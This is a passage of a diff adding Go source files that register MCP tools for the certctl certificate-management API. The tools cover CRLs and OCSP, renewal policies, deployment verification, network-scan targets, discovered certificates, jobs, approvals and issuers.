return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── CRL & OCSP ──────────────────────────────────────────────────────
|
||||||
|
//
|
||||||
|
// M-006 relocation: CRL and OCSP are served unauthenticated under the
|
||||||
|
// RFC 8615 `.well-known/pki/*` namespace (RFC 5280 §5 for CRL, RFC 6960
|
||||||
|
// §2.1 for OCSP) so relying parties can retrieve them without a certctl
|
||||||
|
// API key. The non-standard JSON CRL tool (`certctl_get_crl`) has been
|
||||||
|
// removed — RFC 5280 defines only the DER wire format.
|
||||||
|
|
||||||
|
func registerCRLOCSPTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_der_crl",
|
||||||
|
Description: "Get DER-encoded X.509 CRL for a specific issuer (RFC 5280). Served unauthenticated at /.well-known/pki/crl/{issuer_id}. Returns binary CRL data signed by the issuing CA.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetDERCRLInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
raw, contentType, err := c.GetRaw("/.well-known/pki/crl/" + input.IssuerID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return &gomcp.CallToolResult{
|
||||||
|
Content: []gomcp.Content{
|
||||||
|
&gomcp.TextContent{Text: fmt.Sprintf("DER CRL retrieved (%d bytes, content-type: %s)", len(raw), contentType)},
|
||||||
|
},
|
||||||
|
}, nil, nil
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_ocsp_check",
|
||||||
|
Description: "Check OCSP status for a certificate by issuer ID and hex serial number (RFC 6960). Served unauthenticated at /.well-known/pki/ocsp/{issuer_id}/{serial}. Returns good, revoked, or unknown.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input OCSPInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
raw, contentType, err := c.GetRaw("/.well-known/pki/ocsp/" + input.IssuerID + "/" + input.Serial)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return &gomcp.CallToolResult{
|
||||||
|
Content: []gomcp.Content{
|
||||||
|
&gomcp.TextContent{Text: fmt.Sprintf("OCSP response retrieved (%d bytes, content-type: %s)", len(raw), contentType)},
|
||||||
|
},
|
||||||
|
}, nil, nil
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Renewal Policies (Phase C — P1-1..P1-5) ─────────────────────────
|
||||||
|
//
|
||||||
|
// 2026-05-05 CLI/API/MCP↔GUI parity audit closure. The G-1 milestone shipped
|
||||||
|
// renewal_policies as a separate resource from the policy engine; the GUI
|
||||||
|
// has the page and the API has full CRUD, but MCP previously had zero
|
||||||
|
// coverage. Note: the MCP "policy" tools registered by registerPolicyTools
|
||||||
|
// already point at /api/v1/renewal-policies (legacy alias) — these new tools
|
||||||
|
// expose the renewal-policy domain directly with explicit naming.
|
||||||
|
|
||||||
|
func registerRenewalPolicyTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_renewal_policies",
|
||||||
|
Description: "List renewal policies (GET /api/v1/renewal-policies). Each policy controls renewal-window, retry, and alert-threshold/severity matrix for managed certificates.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/renewal-policies", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_renewal_policy",
|
||||||
|
Description: "Get a single renewal policy (GET /api/v1/renewal-policies/{id}).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/renewal-policies/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_renewal_policy",
|
||||||
|
Description: "Create a renewal policy (POST /api/v1/renewal-policies). Required: name. Reasonable defaults exist server-side for renewal_window_days, retries, and alert thresholds.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateRenewalPolicyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/renewal-policies", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_renewal_policy",
|
||||||
|
Description: "Update a renewal policy (PUT /api/v1/renewal-policies/{id}).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateRenewalPolicyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/renewal-policies/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_renewal_policy",
|
||||||
|
Description: "Delete a renewal policy (DELETE /api/v1/renewal-policies/{id}). Returns HTTP 409 if any managed_certificates still reference the policy (FK-RESTRICT via ErrRenewalPolicyInUse).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/renewal-policies/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Verification (Phase G — P1-32, P1-34, P1-35) ────────────────────
|
||||||
|
//
|
||||||
|
// 2026-05-05 CLI/API/MCP↔GUI parity audit closure. P1-33 (POST
|
||||||
|
// /api/v1/agents/{id}/discoveries) is intentionally excluded — it is a
|
||||||
|
// machine-to-machine push channel for agents reporting filesystem-scan
|
||||||
|
// results, not an operator-driven flow. The remaining three round out
|
||||||
|
// MCP coverage of certificate-deployment and job-verification surfaces.
|
||||||
|
|
||||||
|
func registerVerificationTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_certificate_deployments",
|
||||||
|
Description: "List deployments for a managed certificate (GET /api/v1/certificates/{id}/deployments). Returns the per-target deployment status rows for the named cert.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/certificates/"+input.ID+"/deployments", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_verify_job",
|
||||||
|
Description: "Record post-deployment verification for a job (POST /api/v1/jobs/{id}/verify). Required: target_id, expected_fingerprint, actual_fingerprint. Typically called by agents after probing the live TLS endpoint, but exposed here for operator-driven manual verification.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input VerifyJobInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]any{
|
||||||
|
"target_id": input.TargetID,
|
||||||
|
"expected_fingerprint": input.ExpectedFingerprint,
|
||||||
|
"actual_fingerprint": input.ActualFingerprint,
|
||||||
|
"verified": input.Verified,
|
||||||
|
}
|
||||||
|
if input.Error != "" {
|
||||||
|
body["error"] = input.Error
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/jobs/"+input.ID+"/verify", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_job_verification",
|
||||||
|
Description: "Get the recorded verification status for a job (GET /api/v1/jobs/{id}/verification). Returns the latest VerificationResult row (expected/actual fingerprint, verified bool, timestamp).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/jobs/"+input.ID+"/verification", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
@@ -0,0 +1,168 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package mcp
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
|
||||||
|
gomcp "github.com/modelcontextprotocol/go-sdk/mcp"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 10 (2026-05-14): extracted from
|
||||||
|
// internal/mcp/tools.go via the Option B sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file groups the discovery MCP tool domain:
|
||||||
|
//
|
||||||
|
// - registerNetworkScanTools — Phase D P1-14..P1-19 — network-scan
|
||||||
|
// target CRUD + manual-scan trigger. Drives the inbound side of
|
||||||
|
// the discovery pipeline (the server-initiated scans against
|
||||||
|
// CIDRs / hostnames the operator declared).
|
||||||
|
// - registerDiscoveryReadTools — Phase E P1-10..P1-13 — read-side
|
||||||
|
// surface for discovered certificates (list / get / claim /
|
||||||
|
// dismiss). The claim + dismiss subtools also exist under
|
||||||
|
// registerHealthTools for historical-placement reasons
|
||||||
|
// (pre-2026-05-05 I-2 closure parked them with the health
|
||||||
|
// surface); those duplicate registrations are intentional and
|
||||||
|
// documented in the pre-extract comments at the Discovery
|
||||||
|
// read-side banner.
|
||||||
|
|
||||||
|
// ── Network-Scan Targets (Phase D — P1-14..P1-19) ───────────────────
|
||||||
|
//
|
||||||
|
// 2026-05-05 CLI/API/MCP↔GUI parity audit closure. AI-assistant queries like
|
||||||
|
// "what new certs did the scanner find on my fleet?" or "trigger a scan of
|
||||||
|
// the DC1 web tier" had no MCP path. trigger_network_scan returns the
|
||||||
|
// scan-row body so the AI can subsequently call list_discovered_certificates.
|
||||||
|
|
||||||
|
func registerNetworkScanTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_network_scan_targets",
|
||||||
|
Description: "List network-scan targets (GET /api/v1/network-scan-targets). Each target is a (CIDR, ports) tuple the scheduler probes for TLS certificates.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/network-scan-targets", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_network_scan_target",
|
||||||
|
Description: "Get a single network-scan target (GET /api/v1/network-scan-targets/{id}).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/network-scan-targets/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_create_network_scan_target",
|
||||||
|
Description: "Create a network-scan target (POST /api/v1/network-scan-targets). Provide cidrs and ports for the scanner to probe (e.g. cidrs=['10.0.0.0/24'], ports=[443,8443]).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input CreateNetworkScanTargetInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/network-scan-targets", input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_update_network_scan_target",
|
||||||
|
Description: "Update a network-scan target (PUT /api/v1/network-scan-targets/{id}).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input UpdateNetworkScanTargetInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Put("/api/v1/network-scan-targets/"+input.ID, input)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_delete_network_scan_target",
|
||||||
|
Description: "Delete a network-scan target (DELETE /api/v1/network-scan-targets/{id}).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Delete("/api/v1/network-scan-targets/" + input.ID)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_trigger_network_scan",
|
||||||
|
Description: "Trigger an immediate network scan of a target (POST /api/v1/network-scan-targets/{id}/scan). Returns the discovery-scan body when certs are found; the AI can then call certctl_list_discovered_certificates filtered by agent_id to view results.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/network-scan-targets/"+input.ID+"/scan", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Discovery read-side (Phase E — P1-10..P1-13) ────────────────────
|
||||||
|
//
|
||||||
|
// 2026-05-05 CLI/API/MCP↔GUI parity audit closure. The MCP server already
|
||||||
|
// has certctl_claim_discovered_certificate + certctl_dismiss_discovered_certificate
|
||||||
|
// (registered by registerHealthTools — historical placement; see I-2 closure).
|
||||||
|
// This phase adds the read-side so operators can ask "what's in the triage
|
||||||
|
// queue?" and "what did the scanner pick up overnight?".
|
||||||
|
|
||||||
|
func registerDiscoveryReadTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_discovered_certificates",
|
||||||
|
Description: "List discovered certificates (GET /api/v1/discovered-certificates). These are TLS certs found by agent filesystem scans + network scans that are not yet under management. Filter by agent_id and/or status (Unmanaged, Managed, Dismissed).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListDiscoveredCertificatesInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
if input.AgentID != "" {
|
||||||
|
q.Set("agent_id", input.AgentID)
|
||||||
|
}
|
||||||
|
if input.Status != "" {
|
||||||
|
q.Set("status", input.Status)
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/discovered-certificates", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_discovered_certificate",
|
||||||
|
Description: "Get a single discovered certificate (GET /api/v1/discovered-certificates/{id}). Returns the dc-* row including subject DN, SANs, fingerprint, observed-at endpoint, and managed_certificate_id (set if claimed).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/discovered-certificates/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_discovery_scans",
|
||||||
|
Description: "List discovery-scan rows (GET /api/v1/discovery-scans). Each row records one agent filesystem scan or network scan run with timing + cert-count.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListDiscoveryScansInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
if input.AgentID != "" {
|
||||||
|
q.Set("agent_id", input.AgentID)
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/discovery-scans", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_discovery_summary",
|
||||||
|
Description: "Return aggregate counts of discovered-certificate states (GET /api/v1/discovery-summary). Useful for triage-queue dashboard queries.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input EmptyInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/discovery-summary", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
@@ -0,0 +1,169 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package mcp
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
|
||||||
|
gomcp "github.com/modelcontextprotocol/go-sdk/mcp"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 10 (2026-05-14): extracted from
|
||||||
|
// internal/mcp/tools.go via the Option B sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file groups the workflow MCP tool domain: jobs (the renewal
|
||||||
|
// + deployment work queue — registerJobTools) and approvals (the
|
||||||
|
// human-in-the-loop gate that fronts every CertificateProfile with
|
||||||
|
// RequiresApproval=true — registerApprovalTools, Phase A P1-28..P1-31).
|
||||||
|
//
|
||||||
|
// The approvalDecisionPayload struct sits alongside its callers
|
||||||
|
// (approve + reject MCP tools) so consumers reading the JSON shape
|
||||||
|
// don't have to chase across the file. It's intentionally unexported
|
||||||
|
// — the only public surface is the approve / reject tool args
|
||||||
|
// rendered by gomcp.AddTool.
|
||||||
|
|
||||||
|
// ── Jobs ────────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerJobTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_jobs",
|
||||||
|
Description: "List jobs with optional status and type filters. Job types: Issuance, Renewal, Deployment, Validation.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListJobsInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
if input.Status != "" {
|
||||||
|
q.Set("status", input.Status)
|
||||||
|
}
|
||||||
|
if input.Type != "" {
|
||||||
|
q.Set("type", input.Type)
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/jobs", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_job",
|
||||||
|
Description: "Get job details including type, status, attempts, errors, and timestamps.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/jobs/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_cancel_job",
|
||||||
|
Description: "Cancel a pending or running job.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/jobs/"+input.ID+"/cancel", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_approve_job",
|
||||||
|
Description: "Approve a job that is in AwaitingApproval state.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Post("/api/v1/jobs/"+input.ID+"/approve", nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_reject_job",
|
||||||
|
Description: "Reject a job in AwaitingApproval state with an optional reason.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input RejectJobInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := map[string]string{}
|
||||||
|
if input.Reason != "" {
|
||||||
|
body["reason"] = input.Reason
|
||||||
|
}
|
||||||
|
data, err := c.Post("/api/v1/jobs/"+input.ID+"/reject", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// ── Approvals (Phase A — P1-28..P1-31) ──────────────────────────────
|
||||||
|
//
|
||||||
|
// 2026-05-05 CLI/API/MCP↔GUI parity audit closure. Operators using AI
|
||||||
|
// assistants for cert-renewal in regulated environments need natural-language
|
||||||
|
// approve/reject. The service layer enforces ErrApproveBySameActor (the
|
||||||
|
// requesting actor cannot self-approve) and the handler extracts the
|
||||||
|
// decided_by actor from auth.UserKey — so the MCP server's API key
|
||||||
|
// identity becomes the audit-trail actor automatically. Two-person integrity
|
||||||
|
// is preserved as long as the MCP server's key is distinct from the
|
||||||
|
// requesting actor's; the tool inputs deliberately omit any actor_id field
|
||||||
|
// to prevent client-side spoofing.
|
||||||
|
|
||||||
|
func registerApprovalTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_approvals",
|
||||||
|
Description: "List issuance approval requests (GET /api/v1/approvals). Optional state/certificate_id/requested_by filters narrow the returned set. Use state=pending to surface the operator-action queue.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListApprovalsInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
q := paginationQuery(input.Page, input.PerPage)
|
||||||
|
if input.State != "" {
|
||||||
|
q.Set("state", input.State)
|
||||||
|
}
|
||||||
|
if input.CertificateID != "" {
|
||||||
|
q.Set("certificate_id", input.CertificateID)
|
||||||
|
}
|
||||||
|
if input.RequestedBy != "" {
|
||||||
|
q.Set("requested_by", input.RequestedBy)
|
||||||
|
}
|
||||||
|
data, err := c.Get("/api/v1/approvals", q)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_approval",
|
||||||
|
Description: "Get a single approval request (GET /api/v1/approvals/{id}). Returns the full ApprovalRequest row — state, requesting actor, linked job, linked certificate.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/approvals/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_approve_request",
|
||||||
|
Description: "Approve an issuance request (POST /api/v1/approvals/{id}/approve). The decided_by actor is derived server-side from the authenticated API-key name; the two-person-integrity contract (ErrApproveBySameActor → HTTP 403) is enforced unconditionally. Optional `note` is captured in the audit row.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ApprovalDecisionInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := approvalDecisionPayload{Note: input.Note}
|
||||||
|
data, err := c.Post("/api/v1/approvals/"+input.ID+"/approve", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_reject_request",
|
||||||
|
Description: "Reject an issuance request (POST /api/v1/approvals/{id}/reject). Same RBAC contract as approve. Optional `note` is captured in the audit row.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ApprovalDecisionInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
body := approvalDecisionPayload{Note: input.Note}
|
||||||
|
data, err := c.Post("/api/v1/approvals/"+input.ID+"/reject", body)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
// approvalDecisionPayload mirrors the handler-side approvalDecisionBody.
|
||||||
|
type approvalDecisionPayload struct {
|
||||||
|
Note string `json:"note,omitempty"`
|
||||||
|
}
|
||||||
@@ -0,0 +1,564 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package mcp
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
|
||||||
|
gomcp "github.com/modelcontextprotocol/go-sdk/mcp"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 10 (2026-05-14): extracted from
|
||||||
|
// internal/mcp/tools.go via the Option B sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file groups the resource-management MCP tool domain — the
|
||||||
|
// configuration surface an operator builds out once and then
|
||||||
|
// references throughout cert issuance:
|
||||||
|
//
|
||||||
|
// - registerIssuerTools — issuer CRUD across the 12 issuer
|
||||||
|
// connectors (local CA, ACME upstream, ADCS / NDES, GlobalSign,
|
||||||
|
// Sectigo, DigiCert, Let's Encrypt, etc.).
|
||||||
|
// - registerTargetTools — deployment target CRUD across the 13
|
||||||
|
// target connectors (nginx / apache / haproxy / F5 / Palo Alto /
|
||||||
|
// IIS / WinCertStore / JavaKeystore / etc.).
|
||||||
|
// - registerPolicyTools — policy / policy-rule CRUD (issuance
|
||||||
|
// policies, key-strength rules, validity caps, EKU constraints).
|
||||||
|
// - registerProfileTools — certificate-profile CRUD (named
|
||||||
|
// bundles of "issuer + policy + targets + renewal cadence").
|
||||||
|
// - registerTeamTools / registerOwnerTools — ownership + RBAC
|
||||||
|
// scoping primitives (assign profiles to teams / owners).
|
||||||
|
// - registerNotificationTools — notification-channel CRUD across
|
||||||
|
// the 6 notifier connectors (email + webhook + chat + paging).
|
||||||
|
// - registerIntermediateCATools — Phase F P1-6..P1-9 (signed
|
||||||
|
// intermediate CA lifecycle: issue / sign / renew / list under
|
||||||
|
// the local issuer).
|
||||||
|
//
|
||||||
|
// Co-located because they're the "configure once, reference
|
||||||
|
// everywhere" half of the API surface; an LLM consumer reasoning
|
||||||
|
// about "what objects can the operator create + edit" sees them
|
||||||
|
// here together.
|
||||||
|
|
||||||
|
// ── Issuers ─────────────────────────────────────────────────────────
|
||||||
|
|
||||||
|
func registerIssuerTools(s *gomcp.Server, c *Client) {
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_list_issuers",
|
||||||
|
Description: "List all configured issuer connectors (Local CA, ACME, step-ca).",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input ListParams) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/issuers", paginationQuery(input.Page, input.PerPage))
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
|
||||||
|
return textResult(data)
|
||||||
|
})
|
||||||
|
|
||||||
|
gomcp.AddTool(s, &gomcp.Tool{
|
||||||
|
Name: "certctl_get_issuer",
|
||||||
|
Description: "Get issuer details including type, configuration, and enabled status.",
|
||||||
|
}, func(ctx context.Context, req *gomcp.CallToolRequest, input GetByIDInput) (*gomcp.CallToolResult, any, error) {
|
||||||
|
data, err := c.Get("/api/v1/issuers/"+input.ID, nil)
|
||||||
|
if err != nil {
|
||||||
|
return errorResult(err)
|
||||||
|
}
